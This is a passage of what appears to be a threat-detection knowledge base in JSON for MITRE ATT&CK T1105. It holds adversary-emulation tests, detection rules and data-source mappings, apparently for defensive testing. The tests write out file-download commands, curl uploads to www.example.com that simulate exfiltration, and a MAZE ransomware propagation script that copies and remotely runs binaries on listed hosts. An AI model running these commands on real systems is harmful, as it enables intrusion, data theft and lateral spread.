"c99a829f-0bb8-4187-b2c6-d47d1df74cab", + "description": "Download a remote file using the whois utility\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_host": { + "description": "Remote hostname or IP address", + "type": "String", + "default": "localhost" + }, + "remote_port": { + "description": "Remote port to connect to", + "type": "Integer", + "default": 8443 + }, + "output_file": { + "description": "Path of file to save output to", + "type": "Path", + "default": "/tmp/T1105.whois.out" + }, + "query": { + "description": "Query to send to remote server", + "type": "String", 
+ "default": "Hello from Atomic Red Team test T1105" + }, + "timeout": { + "description": "Timeout period before ending process (seconds)", + "type": "Integer", + "default": 1 + } + }, + "dependencies": [ + { + "description": "The whois and timeout commands must be present\n", + "prereq_command": "which whois && which timeout\n", + "get_prereq_command": "echo \"Please install timeout and the whois package\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"#{query}\" > #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n" + } + }, + { + "name": "File Download via PowerShell", + "auto_generated_guid": "54a4daf1-71df-4383-9ba7-f1a295d8b6d2", + "description": "Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_remote_file": { + "description": "File to download", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt" + }, + "output_file": { + "description": "File to write to", + "type": "String", + "default": "LICENSE.txt" + } + }, + "executor": { + "command": "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}\n", + "name": "powershell" + } + }, + { + "name": "File download with finger.exe on Windows", + "auto_generated_guid": "5f507e45-8411-4f99-84e7-e38530c45d01", + "description": "Simulate a file download using finger.exe. 
Connect to localhost by default, use custom input argument to test finger connecting to an external server.\nBecause this is being tested on the localhost, you should not be expecting a successful connection\nhttps://www.exploit-db.com/exploits/48815\nhttps://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_host": { + "description": "Remote hostname or IP address", + "type": "String", + "default": "localhost" + } + }, + "executor": { + "name": "command_prompt", + "command": "finger base64_filedata@#{remote_host}\n" + } + }, + { + "name": "Download a file with IMEWDBLD.exe", + "auto_generated_guid": "1a02df58-09af-4064-a765-0babe1a0d1e2", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.\nDownloaded files can be found in \"%LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>/[1].\" or `%LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>/[1]..\nRun \"Get-ChildItem -Path C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\INetCache\\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue\" without quotes and adding the correct username and file name to locate the file.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_url": { + "description": "Location of file to be downloaded.", + "type": "url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml" + }, + "file_name": { + "description": "Name of the file to be downloaded without extension.", + "type": "string", + "default": "T1105" + } + }, + "executor": { + "command": "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled #{remote_url}\n", + "cleanup_command": "$inetcache = $env:LOCALAPPDATA + \"\\Microsoft\\Windows\\INetCache\\\" 
\n$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)\nif(\"\" -ne \"$file_to_be_removed\") { Remove-Item \"$file_to_be_removed\" -ErrorAction Ignore }\n", + "name": "powershell" + } + }, + { + "name": "Curl Download File", + "auto_generated_guid": "2b080b99-0deb-4d51-af0f-833d37c4ca6a", + "description": "The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.\nExpected output will include whether the file downloaded successfully or not.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_download": { + "description": "File to download", + "type": "String", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll" + }, + "curl_path": { + "description": "path to curl.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\Curl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Curl must be installed on system.\n", + "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile $env:temp\\curl.zip\nExpand-Archive -Path $env:temp\\curl.zip -DestinationPath $env:temp\\curl\nCopy-Item $env:temp\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\nRemove-Item $env:temp\\curl\nRemove-Item $env:temp\\curl.zip\n" + } + ], + "executor": { + "command": "#{curl_path} -k #{file_download} -o c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k #{file_download} --output c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k #{file_download} -o c:\\programdata\\allthethingsx64.dll\n#{curl_path} -k #{file_download} -o 
%Temp%\\allthethingsx64.dll\n", + "cleanup_command": "del c:\\users\\public\\music\\allthethingsx64.dll >nul 2>&1\ndel c:\\users\\public\\music\\allthethingsx64.dll >nul 2>&1\ndel c:\\programdata\\allthethingsx64.dll >nul 2>&1\ndel %Temp%\\allthethingsx64.dll >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Curl Upload File", + "auto_generated_guid": "635c9a38-6cbf-47dc-8615-3810bc1167cf", + "description": "The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration\nExpected output will include whether the file uploaded successfully or not.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "curl_path": { + "description": "path to curl.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\Curl.exe" + }, + "remote_destination": { + "description": "Remote destination", + "type": "String", + "default": "www.example.com" + }, + "file_path": { + "description": "File to upload", + "type": "String", + "default": "c:\\temp\\atomictestfile.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Curl must be installed on system.\n", + "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \u201chttps://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\u201d -Outfile $env:temp\\curl.zip\nExpand-Archive -Path $env:temp\\curl.zip -DestinationPath $env:temp\\curl\nCopy-Item $env:temp\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\nRemove-Item $env:temp\\curl\nRemove-Item $env:temp\\curl.zip\n" + }, + { + "description": "A file must be created to upload\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"This is an Atomic Test File\" > #{file_path}\n" + } + ], + "executor": { + "command": "#{curl_path} -T #{file_path} #{remote_destination}\n#{curl_path} --upload-file 
#{file_path} #{remote_destination}\n#{curl_path} -d #{file_path} #{remote_destination}\n#{curl_path} --data #{file_path} #{remote_destination}\n", + "name": "command_prompt" + } + }, + { + "name": "Download a file with Microsoft Connection Manager Auto-Download", + "auto_generated_guid": "d239772b-88e2-4a2e-8473-897503401bcc", + "description": "Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. \nThe issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user.\nUpon successful execution the test will open calculator and Notepad executable for 10 seconds.\nreference:\nhttps://twitter.com/ElliotKillick/status/1455897435063074824\nhttps://github.com/LOLBAS-Project/LOLBAS/pull/151\nhttps://lolbas-project.github.io/lolbas/Binaries/Cmdl32/\nhttps://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Path_to_file": { + "description": "Path to the Batch script", + "type": "Path", + "default": "PathToAtomicsFolder\\T1105\\src\\T1105.bat" + } + }, + "executor": { + "command": "#{Path_to_file} 1>NUL \n", + "cleanup_command": "del /f/s/q %temp%\\T1105 >nul 2>&1\nrmdir /s/q %temp%\\T1105 >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "MAZE Propagation Script", + "auto_generated_guid": "70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf", + "description": "This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\\Temp directory of each one. 
\nUpon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.\nReference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_file": { + "description": "Binary file to copy to remote machines", + "type": "string", + "default": "$env:comspec" + }, + "exe_remote_folder": { + "description": "Path to store executable on remote machine (no drive letter)", + "type": "String", + "default": "\\Windows\\Temp\\T1105.exe" + }, + "remote_drive_letter": { + "description": "Remote drive letter", + "type": "String", + "default": "C" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Binary file must exist at specified location (#{binary_file})\n", + "prereq_command": "if (Test-Path #{binary_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "write-host \"The binary_file input parameter must be set to a binary that exists on this computer.\"\n" + }, + { + "description": "Machine list must exist at specified location (\"$env:temp\\T1105MachineList.txt\")\n", + "prereq_command": "if (Test-Path \"$env:temp\\T1105MachineList.txt\") {exit 0} else {exit 1}\n", + "get_prereq_command": "new-item -path \"$env:temp\\T1105MachineList.txt\"\necho \"A machine list file has been generated at \"$env:temp\\T1105MachineList.txt\". 
Please enter the machines to target there, one machine per line.\"\n" + } + ], + "executor": { + "command": "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "cleanup_command": "if (test-path \"$env:temp\\T1105CompletedHosts.txt\") \n{foreach ($machine in get-content -path \"$env:temp\\T1105CompletedHosts.txt\")\n{wmic /node: \"$machine\" process where name='\"regsvr32.exe\"' call terminate | out-null\nRemove-Item -path \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\" -force -erroraction silentlycontinue}}\nRemove-Item -path \"$env:temp\\T1105OfflineHosts.txt\" -erroraction silentlycontinue\nRemove-item -path \"$env:temp\\T1105CompletedHosts.txt\" -erroraction silentlycontinue\n", + "name": "powershell" + } + }, + { + "name": "Printer Migration Command-Line Tool UNC share folder into a zip file", + "auto_generated_guid": "49845fc1-7961-4590-a0f0-3dbcf065ae7e", + "description": "Create a ZIP file from a folder in a remote drive\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Path_unc": { + "description": "Path to the UNC folder", + "type": "Path", + "default": "\\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\" + }, + "Path_PrintBrm": { + "description": "Path to PrintBrm.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe" + } + }, + "executor": { + "command": "del %TEMP%\\PrintBrm.zip >nul 2>&1 \n#{Path_PrintBrm} -b -d #{Path_unc} -f %TEMP%\\PrintBrm.zip -O 
FORCE\n", + "cleanup_command": "del %TEMP%\\PrintBrm.zip >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Lolbas replace.exe use to copy file", + "auto_generated_guid": "54782d65-12f0-47a5-b4c1-b70ee23de6df", + "description": "Copy file.cab to destination\nReference: https://lolbas-project.github.io/lolbas/Binaries/Replace/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "replace_cab": { + "description": "Path to the cab file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1105\\src\\redcanary.cab" + }, + "Path_replace": { + "description": "Path to replace.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\replace.exe" + } + }, + "executor": { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} #{replace_cab} %TEMP% /A\n", + "cleanup_command": "del %TEMP%\\redcanary.cab >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Lolbas replace.exe use to copy UNC file", + "auto_generated_guid": "ed0335ac-0354-400c-8148-f6151d20035a", + "description": "Copy UNC file to destination\nReference: https://lolbas-project.github.io/lolbas/Binaries/Replace/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "replace_cab": { + "description": "UNC Path to the cab file", + "type": "Path", + "default": "\\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\redcanary.cab" + }, + "Path_replace": { + "description": "Path to replace.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\replace.exe" + } + }, + "executor": { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} #{replace_cab} %TEMP% /A\n", + "cleanup_command": "del %TEMP%\\redcanary.cab >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "60f63260-39bb-4136-87a0-b6c2dca799fc", + "name": "Install PowerShell Core 6", + "description": "Download, install and start new process under PowerShell Core 6", + "tactic": "command-and-control", + "technique": { + "attack_id": "T1105", + 
"name": "Ingress Tool Transfer" + }, + "platforms": { + "windows": { + "psh": { + "command": "$wc=New-Object System.Net.WebClient;\n$output=\"PowerShellCore.msi\";\n$wc.DownloadFile(\"https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi\", $output);\nStart-Process msiexec.exe -ArgumentList \"/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1\" -Wait;\n$env:Path += \";C:\\Program Files\\Powershell\\6\";\nStart-Process pwsh -ArgumentList \"-c #{location} -server #{server} - group #{group}\" -WindowStyle hidden;\n", + "cleanup": "rm PowerShellCore.msi;\n" + } + } + } + }, + { + "id": "eb814e03-811a-467a-bc6d-dcd453750fa2", + "name": "Install PSTools", + "description": "Download and install PSTools by unzipping the file", + "tactic": "command-and-control", + "technique": { + "attack_id": "T1105", + "name": "Ingress Tool Transfer" + }, + "platforms": { + "windows": { + "psh": { + "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadFile(\"https://download.sysinternals.com/files/PSTools.zip\", \"PSTools.zip\");\nNew-Item -ItemType \"directory\" C:\\Windows\\System32\\PSTools -Force;\nAdd-Type -Assembly 'System.IO.Compression.FileSystem'; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"PSTools.zip\", \"C:\\Windows\\System32\\PSTools\");\n" + } + } + } + }, + { + "Rules": "ET Open", + "SID": "2027267", + "Signature": "ET ATTACK\\_RESPONSE Possible Lateral Movement - File Creation Request in Remote System32 Directory", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET ATTACK\\_RESPONSE Possible Lateral Movement - File Creation Request in Remote System32 Directory", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Pandemic Registry Key", + "id": 
"47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "experimental", + "description": "Detects Pandemic Windows Implant", + "references": [ + "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "author": "Florian Roth", + "detection": { + "condition": "1 of them" + }, + "fields": [ + "EventID", + "CommandLine", + "ParentCommandLine", + "Image", + "User", + "TargetObject" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection1": { + "EventID": 13, + "TargetObject": [ + "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\services\\null\\Instance*", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\services\\null\\Instance*", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet002\\services\\null\\Instance*" + ] + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection2": { + "Command": "loaddll -a *" + } + } + }, + { + "title": "Microsoft Binary Github Communication", + "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "status": "experimental", + "description": "Detects an executable in the Windows folder accessing github.com", + "references": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752" + ], + "author": "Michael Haag (idea), Florian Roth (rule)", + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Initiated": "true", + "DestinationHostname": [ + "*.github.com", + "*.githubusercontent.com" + ], + "Image": "C:\\Windows\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown", + "@subTee in your network" + ], + "level": "high" + }, + { + "title": "Microsoft 
Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "experimental", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "references": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752" + ], + "author": "Florian Roth", + "date": "2018/08/30", + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Initiated": "true", + "DestinationHostname": [ + "*dl.dropboxusercontent.com", + "*.pastebin.com", + "*.githubusercontent.com" + ], + "Image": "C:\\Windows\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Certutil Command", + "id": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", + "status": "experimental", + "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code with the built-in certutil utility", + "author": "Florian Roth, juju4, keepwatch", + "modified": "2019/01/22", + "references": [ + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://twitter.com/subTee/status/888102593838362624", + "https://twitter.com/subTee/status/888071631528235010", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* -decode *", + "* /decode *", + "* -decodehex *", + "* /decodehex *", + "* -urlcache *", + "* /urlcache *", + "* -verifyctl *", + "* 
/verifyctl *", + "* -encode *", + "* /encode *", + "*certutil* -URL*", + "*certutil* /URL*", + "*certutil* -ping*", + "*certutil* /ping*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1105", + "attack.s0189", + "attack.g0007" + ], + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "high" + }, + { + "title": "Malicious payload download via Office binaries", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "experimental", + "description": "Downloads payload from remote server", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", + "Reegun J (OCBC Bank)" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "level": "high", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": [ + "\\powerpnt.exe", + "\\winword.exe", + "\\excel.exe" + ], + "CommandLine|contains": "http" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ] + }, + [ + "4663", + "File monitoring" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "4663", + "File monitoring" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., 
as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
